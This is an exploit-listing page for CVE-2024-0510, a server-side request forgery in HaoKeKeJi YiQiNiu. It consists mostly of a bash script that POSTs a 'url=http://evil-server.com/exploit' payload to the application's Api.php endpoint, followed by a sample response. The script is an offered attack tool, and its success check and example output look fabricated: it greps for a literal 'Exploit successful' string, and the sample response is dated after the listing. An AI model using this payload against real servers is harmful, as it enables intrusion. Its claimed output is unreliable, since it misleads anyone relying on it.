Exploit for HaoKeKeJi YiQiNiu Server-Side Request Forgery CVE-2024-0510

Name: Exploit for HaoKeKeJi YiQiNiu Server-Side Request Forgery CVE-2024-0510
Rating: 5 (127 reviews)

2024-01-15 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:176547
#!/bin/bash  
  
# Set target URL and payload  
target_url="http://example.com/application/pay/controller/Api.php"  
payload="url=http://evil-server.com/exploit"  
  
# Send the malicious request  
response=$(curl -s -X POST -d "$payload" "$target_url")  
  
# Check if the exploit was successful  
if echo "$response" | grep -q "Exploit successful"; then  
echo "Exploit succeeded"  
else  
echo "Exploit failed"  
fi  
  
# Example payload and response  
payload="url=http://evil-server.com/exploit"  
response="HTTP/1.1 200 OK  
Server: nginx/1.14.0 (Ubuntu)  
Date: Mon, 01 Dec 2024 20:23:43 GMT  
Content-Type: text/html; charset=UTF-8  
Content-Length: 25  
Connection: keep-alive  
  
Exploit successful"